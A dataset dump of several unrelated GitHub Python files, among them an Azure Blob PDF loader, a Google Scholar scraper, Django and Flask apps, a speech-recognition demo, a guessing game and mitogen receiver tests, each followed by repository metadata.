account_key='myaccountkey')\n connection_string = instance._BlobStorageConnection__string_connection_blob_storage()\n print(connection_string)\n # Output: 'DefaultEndpointsProtocol=https;AccountName=myaccount;AccountKey=myaccountkey;EndpointSuffix=core.windows.net;'\n \"\"\"\n string_connection = \"DefaultEndpointsProtocol=https;\"\n string_connection += f\"AccountName={self.account_name};\"\n string_connection += f\"AccountKey={self.account_key};\"\n string_connection += \"EndpointSuffix=core.windows.net;\"\n return string_connection\n\n @staticmethod\n def __retrieve_file_from_blob_storage(\n container_client: ContainerClient, blob_name: str\n ) -> StorageStreamDownloader:\n \"\"\"\n Retrieve the content of a file from Azure Blob Storage.\n\n This function retrieves the content of a file stored in Azure Blob Storage\n using the provided `container_client` and `blob_name`.\n\n Parameters\n ----------\n None\n\n Returns\n -------\n azure.storage.blob.BlobDownloadStream\n A BlobDownloadStream object representing the downloaded file content.\n \"\"\"\n blob_client = container_client.get_blob_client(blob_name)\n blob_content = blob_client.download_blob()\n return blob_content\n\n def __create_list_path_blobs(\n self, blob_container: ContainerClient, ext=None\n ) -> list:\n \"\"\"\n Create a list of file paths for blobs in Azure Blob Storage.\n\n This function generates a list of file paths for blobs located in the specified\n `blob_container` and starting with the given `init_path`. You can optionally\n provide a list of file extensions to filter the results.\n\n Parameters\n ----------\n self\n blob_container : azure.storage.blob.ContainerClient\n A container client instance pointing to the Azure Blob Storage container.\n ext : list, optional\n A list of file extensions to filter the results. If not provided, the default\n extension list [\".pdf\"] will be used.\n\n Returns\n -------\n list\n A list of file paths for blobs matching the given criteria.\n \"\"\"\n\n if ext is None:\n ext = [\".pdf\"]\n\n blob_path_files = blob_container.list_blobs(name_starts_with=self.prefix)\n path_files = [\n blob.name\n for blob in blob_path_files\n if os.path.splitext(blob.name)[-1] in ext\n ]\n return path_files\n\n def __generate_pandas_dataframe_from_blob(\n self, list_path_blobs: list, blob_container_: ContainerClient\n ) -> pd.DataFrame:\n \"\"\"\n Generate a pandas DataFrame from PDFs stored as blobs in Azure Blob Storage.\n\n This function reads PDFs stored as blobs in the specified `blob_container_` and\n extracts information such as the file path, page number, and content. It then\n creates a pandas DataFrame containing this information.\n\n Parameters\n ----------\n self\n list_path_blobs : list\n A list of file paths for the PDF blobs to be processed.\n blob_container_ : azure.storage.blob.ContainerClient\n A container client instance pointing to the Azure Blob Storage container.\n\n Returns\n -------\n pd.DataFrame\n A pandas DataFrame containing information about PDFs, including their file\n paths, page numbers, and extracted content.\n \"\"\"\n list_pdfs = []\n list_name_path = []\n list_page = []\n list_content = []\n list_index_document = []\n\n for i, path in enumerate(list_path_blobs):\n pdf_binary = self.__retrieve_file_from_blob_storage(blob_container_, path)\n stream = io.BytesIO()\n pdf_binary.readinto(stream)\n pdf = pypdf.PdfReader(stream, strict=True)\n list_pdfs.append((i, pdf))\n\n # enumerate each page of each file\n for j, page in enumerate(pdf.pages):\n list_name_path.append(path)\n list_page.append(j)\n list_content.append(page.extract_text())\n list_index_document.append(i)\n\n columns_name = [\"name_path\", \"index_document\", \"page\", \"content\"]\n columns_data = [list_name_path, list_index_document, list_page, list_content]\n dict_pdf_info = dict(zip(columns_name, columns_data))\n return pd.DataFrame(dict_pdf_info)\n\n @staticmethod\n def clean_content(x: str) -> str:\n \"\"\"\n Clean the input text by removing line breaks, strange symbols, and double spaces.\n\n This function applies regular expressions to the input text in order to remove line\n breaks, non-alphanumeric characters, and consecutive spaces. It returns the cleaned text.\n\n Parameters\n ----------\n x : str\n The input text to be cleaned.\n\n Returns\n -------\n str\n The cleaned text with line breaks, strange symbols, and double spaces removed.\n \"\"\"\n x = re.sub(r\"[\\r\\n\\t]+|[^a-zA-Z0-9\\s.,!?_(){}\\[\\]+=\\-/*]+| {2,}\", \"\", x)\n x = re.sub(r\"\\s+\", \" \", x).strip()\n x = re.sub(r\". ,\", \"\", x)\n # remove all instances of multiple spaces\n x = x.replace(\"..\", \".\")\n x = x.replace(\". .\", \".\")\n x = x.replace(\"\\n\", \"\")\n x = x.strip()\n return x\n\n def load_document(self) -> pd.DataFrame:\n \"\"\"\n Create a pandas DataFrame with cleaned content from documents stored as blobs.\n\n This function connects to Azure Blob Storage using the provided credentials and\n retrieves PDF documents stored as blobs. It generates a pandas DataFrame with\n information about the documents, including cleaned content.\n\n Parameters\n ----------\n self\n\n Returns\n -------\n pd.DataFrame\n A pandas DataFrame containing information about documents, including their\n file paths, page numbers, and cleaned content.\"\"\"\n blob_container = self.__connect_blob_storage()\n path_blobs = self.__create_list_path_blobs(blob_container)\n df = self.__generate_pandas_dataframe_from_blob(path_blobs, blob_container)\n df[\"content\"] = df.content.apply(lambda x: self.clean_content(x))\n return df\n","repo_name":"Giovanny-Encinia/prompt_enginnering_embedings","sub_path":"load_transform_data/loader_blob_storage.py","file_name":"loader_blob_storage.py","file_ext":"py","file_size_in_byte":9002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34523923797","text":"import random\nimport json\nimport sqlite3\nimport time\nimport datetime\nimport requests\nimport numpy as np\nfrom bs4 import BeautifulSoup\n\nuser_agent_list = [\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9',\n 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1',\n 'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36'\n]\n\nfor i in range(1, 4):\n user_agent = random.choice(user_agent_list)\nheaders = {'User-Agent': user_agent}\n\nconn = sqlite3.connect('articles.db')\nc = conn.cursor()\n\n# Add terms you want to scrape here\nterms = ['children+military', 'reintegration', 'military+families', 'divorce+military',\n 'spouses+military', 'military+deployments', 'active+duty', 'military+ptsd', 'military+youth', 'military+reintegration', 'service+members+ptsd',\n 'military+veterans', '\\\"war+and+terrorism\\\"', 'military', 'armed+forces', 'military+spouses', 'military+divorce',\n 'military+parenting', 'service+members', 'soldiers', 'airmen', 'marines', 'sailor', 'coast+guardsmen', 'national+guardsmen',\n 'reservists', 'veterans', 'posttraumatic+stress+disorder', 'reserve+component', 'war', 'terrorism']\n\n\n# Function to create the database table. Only required to run on first iteration.\ndef create_db():\n c.execute(\n '''CREATE TABLE articles(title TEXT, author TEXT, description TEXT, url TEXT)''')\n\n\n# Function to scrape multiple pages\ndef scrape():\n for term in terms:\n URL = 'https://scholar.google.com/scholar?start=00&q=' + \\\n (term)+'&hl=en&as_sdt=0,1'\n # Scrape the first 2 pages of the key term (first 20 articles)\n for page in range(0, 2):\n new_url = URL[:41] + str(page) + URL[42:]\n time.sleep((30-5)*np.random.random()+5)\n html = requests.get(new_url, headers=headers).text\n soup = BeautifulSoup(html, 'html.parser')\n\n # Parsing through the data and grabbing what we need to populate our DB\n for result in soup.select('.gs_ri'):\n title = result.select_one('.gs_rt').text\n author = result.select_one('.gs_a').text\n description = result.select_one('.gs_rs').text\n url = result.select_one('.gs_rt a')['href']\n try:\n all_article_versions = result.select_one(\n 'a~ a+ .gs_nph')['href']\n except:\n all_article_versions = None\n c.execute('''INSERT INTO articles VALUES(?,?,?,?)''',\n (title, author, description, url))\n print('Finished scraping page ' + str(page) + ' of term: ' + term)\n\n\ncreate_db() # Comment out this line once you've created the database file\n# scrape()\nconn.commit()\nconn.close()\n","repo_name":"joxhkim/REACHus","sub_path":"scraper/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43401475340","text":"import sys\nimport os.path\nimport os\nfrom src import controller\n\nif len(sys.argv) > 1:\n try:\n groups, status, outdir = controller.run(sys.argv[1])\n if not status:\n print('Could not completely meet all rules')\n except Exception as e:\n print(e)\nelse:\n # import gui stuff only if we are going to use it\n from Tkinter import *\n from tkFileDialog import askopenfilename\n from tkMessageBox import showerror, showinfo\n\n path = askopenfilename()\n d, f = os.path.split(path)\n os.chdir(d)\n try:\n groups, status, outdir = controller.run(f)\n except Exception as e:\n showerror('GroupEng Error', '{0}'.format(e))\n\n if status:\n showinfo(\"GroupEng\", \"GroupEng Run Succesful\\n Output in: {0}\".format(outdir))\n else:\n showinfo(\"GroupEng\", \"GroupEng Ran Correctly but not all rules could be met\\n\"\n \"Output in: {0}\".format(outdir))\n \n","repo_name":"ehudhala/GroupEng","sub_path":"GroupEng.py","file_name":"GroupEng.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21817340453","text":"#!/usr/bin/env python\n\nfrom .global_config import default_arg_names, default_stack_arg_names\n\n\ndef predict_parameter_pointer_in_backward(callsite):\n \"\"\"\n In backward, the callsite's backward exprs should predict whether contain parameter ptrs.\n (2147483627) (ptr) (B-0)>\n \"\"\"\n parameter_ptrs = []\n context_info = {}\n backward_exprs = callsite.backward_exprs\n # live_defs = callsite.live_defs\n\n for pre_block in callsite.predecessors:\n # print(\"uuu- pre: %s\" % (pre_block))\n live_defs = pre_block.live_defs\n for arg in default_arg_names:\n get_context_alias_info(arg, context_info, live_defs)\n # print(\"callsite: %s has context: \\n%s\" % (callsite, context_info))\n\n for trace_expr in backward_exprs:\n trace_sims = trace_expr.expr.sims\n if len(trace_expr.expr.sim_actions) == 0:\n continue\n\n for var, sim in trace_sims.items():\n for alias, info in context_info.items():\n if type(alias) is tuple and alias[1] == var:\n arg, arg_type = info\n if arg_type is None:\n arg_type = find_stack_var_type(var, trace_expr)\n\n if arg_type == 'ptr' and arg not in parameter_ptrs:\n parameter_ptrs.append(arg)\n\n elif alias == var:\n arg, arg_type = context_info[var]\n if arg_type is None:\n arg_type = sim.var_type\n\n if arg_type == 'ptr' and arg not in parameter_ptrs:\n parameter_ptrs.append(arg)\n\n # print(\"Get parameter_ptrs: %s\" % (parameter_ptrs))\n return parameter_ptrs\n\ndef find_stack_var_type(addr, trace_expr):\n \"\"\"\n Find a stack variable's type by the sim_actoins, e.g., load(stack_addr)\n \"\"\"\n sim_actions = trace_expr.expr.sim_actions\n for i, sim_action in sim_actions.items():\n action_data = sim_action.action_data\n # print(sim_action)\n if action_data.op == 'Load' and action_data.args[0].op == 'BVV' and action_data.args[0].args[0] == addr:\n return sim_action.var_type\n\ndef get_context_alias_info(arg, context_info, live_defs):\n \"\"\"\n \"\"\"\n if arg not in live_defs:\n return\n arg_at = live_defs[arg]\n # print(\"context-%s %s\" % (arg, arg_at))\n arg_alias = arg_at.src_alias if type(arg_at.src_alias) is str else arg_at.src\n if type(arg_alias) is str:\n if 't' in arg_alias and arg_alias in live_defs:\n arg_alias = get_stack_load_addr(arg_alias, live_defs)\n if arg_alias:\n context_info[arg_alias] = (arg, arg_at.var_type)\n\n if type(arg_at.value) is int and arg_at.src_type == 'S':\n context_info[arg_at.value] = (arg, 'ptr')\n\ndef get_stack_load_addr(tmp, live_defs):\n \"\"\"\n For the 'txx = Load(stack_addr)', the the load stack pointer.\n \"\"\"\n tmp_at = live_defs[tmp]\n if tmp_at.action_type == 'wl' and tmp_at.addr_type == 'S' and type(tmp_at.addr_value) is int:\n # print(\"Stack-load-addr %x\" % (tmp_at.addr_value))\n return ('*', tmp_at.addr_value)\n","repo_name":"kuc001/EmTaint","sub_path":"dataflow/call_context.py","file_name":"call_context.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"5"} +{"seq_id":"11689382853","text":"class Evaluator:\n @staticmethod\n def zip_evaluate(coeffs: list, words: list) -> float:\n if not isinstance(words, list) or not isinstance(coeffs, list):\n return -1\n if len(words) != len(coeffs):\n return -1\n if len(words) == 0:\n return -1\n result = 0\n for word, coeff in zip(words, coeffs):\n if not isinstance(word, str) or not isinstance(coeff, float):\n print('ERROR')\n return -1\n result += (len(word) * coeff)\n return result\n\n @staticmethod\n def enumerate_evaluate(coeffs: list, words: list) -> float:\n if not isinstance(words, list) or not isinstance(coeffs, list):\n return -1\n if len(words) != len(coeffs):\n return -1\n if len(words) == 0:\n return -1\n result = 0\n for i, word in enumerate(words):\n if not isinstance(word, str) or not isinstance(coeffs[i], float):\n print('ERROR')\n result += (len(word) * coeffs[i])\n return result\n\n\nif __name__ == '__main__':\n words = [\"Le\", \"Lorem\", \"Ipsum\", \"est\", \"simple\"]\n coefs = [1.0, 2.0, 1.0, 4.0, 0.5]\n print(Evaluator.zip_evaluate(coefs, words))\n words = [\"Le\", \"Lorem\", \"Ipsum\", \"n’\", \"est\", \"pas\", \"simple\"]\n coefs = [0.0, -1.0, 1.0, -12.0, 0.0, 42.42]\n print(Evaluator.enumerate_evaluate(coefs, words))\n","repo_name":"Glagan/42-python-module","sub_path":"module01/ex04/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14499230241","text":"from . import views\nfrom django.urls import path\n\napp_name = 'port_db'\nurlpatterns = [\n path('', views.home, name='home'),\n path('hobbies/', views.hobbies, name='hobbies'),\n path('portfolio/', views.portfolio, name='portfolio'),\n path('contact/', views.contact, name='contact'),\n path('hobbies//', views.hobby_detail, name='hobby_detail'),\n path('portfolio//', views.project_detail, name='portfolio_detail'),\n path('portfolio/add/', views.addProject, name='addProject'),\n path('portfolio/update//', views.updateProject, name='updateProject'),\n path('portfolio/delete//', views.deleteProject, name='deleteProject'),\n]","repo_name":"tcgregory-weber/challenge4","sub_path":"PortfolioDatabase/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42280197166","text":"import os\nimport sys\nimport json\n\ndef main(template, directory):\n with open(template, 'r') as f:\n template = f.read()\n d = json.loads(template)\n for (name, contents) in d.items():\n key = contents.get(\"prefix\")\n body = contents.get(\"body\")\n assert(body is not None)\n if isinstance(body, list):\n body = '\\n'.join(body)\n\n # create a file and store it in yasnippet\n # format\n base_template = f'# -*- mode: snippet -*-\\n# name: {name}\\n# key: {key}\\n# --\\n'\n base_template += body\n\n with open(os.path.join(directory, name), 'w') as f:\n f.write(base_template)\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print(f'Usage: python3 {sys.argv[0]} template.json directory')\n template, directory = sys.argv[1:]\n main(template, directory)\n\n'''\n# -*- mode: snippet -*-\n# name: CPTemplate\n# key: cpp\n# --\nbody\n'''\n","repo_name":"dinskid/vscode2yasnippet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34706798253","text":"from flask import Flask,jsonify,request\nfrom datetime import datetime\n\n# 静态文件的放置路径,可根据实际情况设置,这里设置为默认路径:'./static/'\napi = Flask(__name__, static_url_path='')\n\n\nfrom apps.kindle import kindle\nfrom utils.domain import allow_cross_domain\n\nfrom settings.db import _db\nimport random\n\n\n@api.route('/kindle', methods=['GET'])\ndef rrr():\n f = _db['k2'].find({},{'_id':0})\n fl = f.count()\n nu = random.randint(0,fl)\n last = f[nu]\n return jsonify(last)\n\n\n@api.route('/zhihu', methods=['GET'])\ndef zhihu():\n f = _db['zhihu_collection'].find({},{'_id':0})\n fl = f.count()\n nu = random.randint(0,fl)\n last = f[nu]\n return jsonify(last)\n\n\n\n\n# 获取某个指定的单词\n@api.route('/create', methods=['POST','OPTIONS'])\n@allow_cross_domain\ndef create():\n print(request.json)\n data = {}\n # if request.json!=None and request.json['secret']=='sj':\n if request.json!=None:\n data['read_time'] = datetime.now()\n data['tag'] = request.json['tag']\n data['content'] = request.json['content']\n # data['find_url'] = request.json['url']\n _db['k2'].insert(data)\n print(data)\n return jsonify({'status': 200})\n\n\n\napi.register_blueprint(kindle,url_prefix='/kindle')\n\n\nif __name__ == '__main__':\n # api.run(debug=True,host='0.0.0.0',)\n api.run(host='0.0.0.0',port=8333)\n","repo_name":"persontianshuang/kkk1","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41250621276","text":"#!/usr/bin/env python3\n#\n# @Author: Josh Erb \n# @Date: 10-Apr-2017 12:04\n# @Email: josh.erb@excella.com\n# @Last modified by: josh.erb\n# @Last modified time: 10-Apr-2017 13:04\n\n\n#####\n# IMPORTS\n#####\n\nimport os\nimport requests\nfrom urllib import parse\nfrom datetime import datetime as dt\n\n#####\n# CONSTANTS\n#####\n\napi_url = 'http://source.unsplash.com/random/2560x1600'\nout_path = os.path.join(os.path.expanduser('~'), 'pictures/backgrounds')\n\n#####\n# FUNCTIONS\n#####\n\n\ndef fetch(url=api_url):\n \"\"\"\n Takes a url string as an argument and performs a request for a\n random photo on the Unsplash API.\n \"\"\"\n # Query the Unsplash API for a random background image\n query = requests.get(url)\n\n # Here in case I run into trouble while running the code\n assert query.status_code == 200, 'Unsuccessful connection to the Unsplash API.'\n\n # hand the query back\n return query\n\n\ndef save_me(response, path=out_path):\n \"\"\"\n Save the returned value of fetch() as a .jpg file in the specified output\n path.\n \"\"\"\n # set the name as the day the photo was pulled\n fn = dt.utcnow().strftime('%Y-%b-%d') + '.jpg'\n\n # save the file to the designated backgrounds folder\n with open(os.path.join(path, fn), 'wb') as f:\n f.write(response.content)\n\n\ndef main():\n \"\"\"\n Main execution function for foto_fetcher.py.\n \"\"\"\n img = fetch()\n save_me(img)\n\n#####\n# EXECUTION\n#####\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"riastrad/Daily-Background","sub_path":"foto_fetcher.py","file_name":"foto_fetcher.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35131199558","text":"from django.shortcuts import render\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import get_object_or_404, render\nfrom django.views import generic\nfrom .models import User\nfrom .models import Tweets , likes , comments,follow\n\ndef Home(request, ids):\n o = User.objects.get(id=ids)\n return render(request, 'tweets/home.html',{'o' : o})\n\n\ndef posttweet(request, ids):\n o = User.objects.get(id=ids)\n return render(request, 'tweets/posttweet.html',{'o' : o})\n\ndef savetweet(request , ids):\n\tif request.method == 'POST':\n\t\to = User.objects.get(id=ids)\t\n\t\tmy_model = Tweets()\t\n\t\tstring = request.POST['tweettext']\n\t\tmy_model.tweet=string\n\t\tmy_model.tweeted_by=o\n\t\tmy_model.save()\n\n\ndef finduser(request , ids):\n\to = User.objects.get(id=ids)\n\treturn render(request, 'tweets/finduser.html',{'o' : o})\n\n\n\ndef fonduser(request , ids):\n\tif request.method == 'POST':\n\t\to = User.objects.get(id=ids)\t\n\t\tstring = request.POST['find_user']\n\t\ttry:\t\t\n\t\t\tfinduser = User.objects.get(name=string)\n\t\t\to={'o':o , 'a':finduser}\n\t\t\treturn render(request, 'tweets/founduserdetails.html' , o)\n\t\texcept User.DoesNotExist:\t\n\t\t\tpass\n\n\ndef followuser(request , ids, aids):\n\tif request.method == 'POST':\n\t\to = User.objects.get(id=ids)\n\t\to2 = User.objects.get(id=aids)\t\n\t\tdb =follow()\n\t\tdb.user=o\n\t\tdb.followed_by=o2\n\t\tdb.save()\n\n\ndef viewtweets (request , ids):\n\to = User.objects.get(id=ids)\n\to2 = follow.objects.filter(user=ids)\n\ta=[]\n\tfor itr in o2 :\n\t\ta.append(User.objects.get(id=itr.followed_by.id))\n\to = {'o' : o ,'a': a}\n\treturn render(request, 'tweets/viewtweets.html', o )\n\n\n\ndef liketweet(request , ids, aids):\n\tobj = User.objects.get(id=ids)\n\to=likes()\n\to.liked_by=obj\n\tobj1 = Tweets.objects.get(tweet=aids)\n\to.tweet = obj1\n\ttry:\t\n\t\tif likes.objects.get(liked_by=o.liked_by ,tweet = o.tweet) :\n\t\t\treturn render(request, 'tweets/likeunsuccesfull.html')\n\t\t\t\t\n\texcept:\n\t\to.save()\n\t\treturn render(request, 'tweets/likesuccesfull.html' )\n\ndef commenttweet(request , ids, aids):\n\tif request.method == 'POST':\t\n\t\tobj = User.objects.get(id=ids)\n\t\to=comments()\n\t\to.commented_by=obj\n\t\tobj = Tweets.objects.get(tweet=aids)\n\t\to.tweet = obj\n\t\tstring = request.POST['comment']\n\t\to.comment=string\n\t\to.save()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"hamzatalat/Twitter-django","sub_path":"tweets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7128786352","text":"import shutil\nfrom multiprocessing import Queue\nfrom time import sleep\n\nimport psutil\n\nfrom onlineasr.online_speech_recognition import OnlineSpeechRecognizer\nfrom utils.logger import Logger\nfrom zamia.decode_mic import *\n\n\nclass SpeechEngine:\n def __init__(self, queue: Queue):\n from config import config\n process = psutil.Process(os.getpid())\n start = process.memory_info()[0]\n if config.ASR == 1:\n self.sr = SpeechRecognizer()\n else:\n self.sr = OnlineSpeechRecognizer()\n usage = process.memory_info()[0] - start\n print(\"[Memory Usage | Speech Recognition]\", usage >> 20)\n self.__queue = queue\n self.__logger_speech = Logger(\"speech\")\n self.__logger_text = Logger(\"text\")\n\n def start_recognition(self):\n from text_classification import TextClassificationEngine\n from config import config\n te = TextClassificationEngine()\n if config.TC == 1:\n get_sentiment = te.get_sentiment\n else:\n get_sentiment = te.get_svm_sentiment\n\n directory = \"/home/darshanakg/speech_commands/new_describe\"\n for file_name in os.listdir(directory):\n source = os.path.join(directory, file_name)\n destination = \"/home/darshanakg/Projects/SensorFusion/zamia/aspire_new/data/test/utt1.wav\"\n if os.path.exists(destination):\n os.remove(destination)\n shutil.copyfile(source, destination)\n self.__logger_speech.start()\n text = self.sr.recognize_speech()\n text = text.strip().lower()\n self.__logger_speech.checkpoint(\"%s,%s\" % (file_name, text))\n self.__logger_text.start()\n sentiment = get_sentiment(text)\n if sentiment:\n self.__queue.put(sentiment)\n self.__logger_text.checkpoint(\"%s,%s,%s\" % (file_name, text, sentiment[\"operation\"]))\n print(\"[Speech] Detected speech: %s [%s]\" % (text, sentiment[\"operation\"]))\n else:\n print(\"[Speech] Detected speech: %s [Invalid Command]\" % text)\n sleep(10)\n self.__logger_speech.save()\n self.__logger_speech.close()\n self.__logger_text.save()\n self.__logger_text.close()\n print(\"IT'S OVER\")\n\n\nif __name__ == \"__main__\":\n queue = Queue()\n se = SpeechEngine(queue)\n se.start_recognition()\n","repo_name":"uom-cse-realitix/SensorFusion","sub_path":"speech_recognition_demo.py","file_name":"speech_recognition_demo.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28499289692","text":"import random\n\nplay = True\n\nplayerName = input('Player Name: ')\n\nprint(f\"Hi {playerName} let's play a guessing game\")\n\nwhile play:\n easy = random.randint(1,10)\n medium = random.randint(1,20)\n hard = random.randint(1,50)\n\n print(\"Enter the level you wish to play\" \"\\nType 'e' for easy, 'm' for medium, 'h' for hard\")\n\n level_selection = True\n while level_selection:\n level = input()\n if level == 'e':\n print(\"\\nAwesome level EASY begins \")\n level_selection = not True\n break\n if level == 'm':\n print(\"\\nAwesome level MEDIUM begins\")\n level_selection = not True\n break\n if level == 'h':\n print(\"\\n Awesome level HARD begins\")\n level_selection = not True\n break\n else:\n print(\"Invalid level selection. Enter either 'e', 'm' or 'h' \")\n break\n\n if level == 'e':\n print(\"You have only 6\\n guesses to guess a number between 1-10 \")\n guess_left = 6\n while guess_left != 0:\n try1 = int(input(\"Enter your guess: \\n\"))\n if try1 == easy:\n print(\"You got it Right!!!!\")\n break\n else:\n\n print(\"That was wrong!!!\")\n guess_left -= 1\n print('You now have ' +str(guess_left)+ ' guesses left')\n\n if guess_left == 1:\n print('just 1 guess to go')\n\n if guess_left == 0:\n print('Game Over!!')\n\n\n if level == 'm':\n print(\"You've got only 4\\n guesses to guess a number between 1-20\")\n guess_left = 4\n while guess_left != 0:\n try1 = int(input(\"Enter your guess: \\n\"))\n if try1 == medium:\n print(\"You got it Right!!!\")\n break\n else:\n print(\"That was wrong\")\n guess_left -=1\n print(\"You've got \" +str(guess_left)+ \"guesses left\")\n\n if guess_left == 1:\n print('Just 1 guess to go')\n\n if guess_left == 0:\n print('Game Over!!')\n\n if level == 'h':\n print(\"You only have 2\\n guesses to guess a number between 1-50 \")\n guess_left = 2\n while guess_left != 0:\n try1 = int(input(\"Enter your Guess: \\n \"))\n if try1 == hard:\n print(\"That is Right!!!\")\n break\n else:\n print(\"That was wrong\")\n guess_left -= 1\n print(\"You've got \" +str(guess_left)+ \" guesses left\")\n\n if guess_left == 1:\n print(\"Just 1 guess to go\")\n\n if guess_left == 0:\n print(\"Game Over\")\n\n play_again = True\n while play_again:\n again = input(\"Would you like to play again? y(Yes)or n(No) \").lower()\n if again == 'no':\n print(\"Thanks for playing\")\n play_again = not True\n play = not True\n elif again == 'yes':\n print(\"Let's play again then \")\n play_again = not True\n play = True\n\n else:\n print(\"please enter yes or no.\")\n input()\n play_again = not True\n play = not True\n\n\n\n\n","repo_name":"Chubi-D/python_task_3","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6991141838","text":"\"\"\"\n78. 子集\n给你一个整数数组 nums ,数组中的元素 互不相同 。返回该数组所有可能的子集(幂集)。\n\n解集 不能 包含重复的子集。你可以按 任意顺序 返回解集。\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n nums.sort()\n results = []\n\n def backtrack(nums, tmp):\n results.append(tmp)\n for i in range(len(nums)):\n backtrack(nums[i + 1:], tmp + [nums[i]])\n\n backtrack(nums, [])\n return results\n","repo_name":"jonbenzhang/python-","sub_path":"08leetcode/1_100/78_子集.py","file_name":"78_子集.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20293334312","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = \"ipetrash\"\n\n\nimport time\nfrom threading import Thread\n\n\ndef thread(my_func):\n def wrapper(*args, **kwargs):\n my_thread = Thread(target=my_func, args=args, kwargs=kwargs)\n my_thread.start()\n\n return wrapper\n\n\nif __name__ == \"__main__\":\n @thread\n def _print_and_sleep(timeout=2):\n print(\"start. print_and_sleep\")\n\n time.sleep(timeout)\n print(\"finish. print_and_sleep\")\n\n @thread\n def _print_loop(name, max_num=10):\n print(\"start. _print_loop\")\n\n i = 0\n\n while True:\n print(name, i)\n time.sleep(1)\n\n i += 1\n if i == max_num:\n break\n\n print(\"finish. _print_loop\")\n\n _print_and_sleep()\n _print_and_sleep(4)\n _print_and_sleep()\n _print_loop(\" loop\")\n","repo_name":"gil9red/SimplePyScripts","sub_path":"Decorators__examples/thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"5"} +{"seq_id":"15275313678","text":"import sys\nimport threading\nimport unittest\n\nimport mitogen.core\nimport testlib\n\n\ndef yield_stuff_then_die(sender):\n for x in range(5):\n sender.send(x)\n sender.close()\n return 10\n\n\nclass ConstructorTest(testlib.RouterMixin, testlib.TestCase):\n def test_handle(self):\n recv = mitogen.core.Receiver(self.router)\n self.assertIsInstance(recv.handle, int)\n self.assertGreater(recv.handle, 100)\n self.router.route(\n mitogen.core.Message.pickled(\n 'hi',\n dst_id=0,\n handle=recv.handle,\n )\n )\n self.assertEqual('hi', recv.get().unpickle())\n\n\nclass IterationTest(testlib.RouterMixin, testlib.TestCase):\n def test_dead_stops_iteration(self):\n recv = mitogen.core.Receiver(self.router)\n fork = self.router.local()\n ret = fork.call_async(yield_stuff_then_die, recv.to_sender())\n self.assertEqual(list(range(5)), list(m.unpickle() for m in recv))\n self.assertEqual(10, ret.get().unpickle())\n\n def iter_and_put(self, recv, latch):\n try:\n for msg in recv:\n latch.put(msg)\n except Exception:\n latch.put(sys.exc_info()[1])\n\n def test_close_stops_iteration(self):\n recv = mitogen.core.Receiver(self.router)\n latch = mitogen.core.Latch()\n t = threading.Thread(\n target=self.iter_and_put,\n args=(recv, latch),\n )\n t.start()\n t.join(0.1)\n recv.close()\n t.join()\n self.assertTrue(latch.empty())\n\n\n\nclass CloseTest(testlib.RouterMixin, testlib.TestCase):\n def wait(self, latch, wait_recv):\n try:\n latch.put(wait_recv.get())\n except Exception:\n latch.put(sys.exc_info()[1])\n\n def test_closes_one(self):\n latch = mitogen.core.Latch()\n wait_recv = mitogen.core.Receiver(self.router)\n t = threading.Thread(target=lambda: self.wait(latch, wait_recv))\n t.start()\n wait_recv.close()\n def throw():\n raise latch.get()\n t.join()\n e = self.assertRaises(mitogen.core.ChannelError, throw)\n self.assertEqual(e.args[0], mitogen.core.Receiver.closed_msg)\n\n def test_closes_all(self):\n latch 